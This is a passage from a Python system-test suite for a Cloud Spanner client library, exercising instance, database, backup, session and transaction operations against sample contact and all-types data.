CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new instance instance and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(30) # raises on failure / timeout.
op2.result(30) # raises on failure / timeout.
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(30)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(30)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is not None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(30)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time_1
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for colum in ALL_TYPES_COLUMNS])
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
[None for colum in EMULATOR_ALL_TYPES_COLUMNS]
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
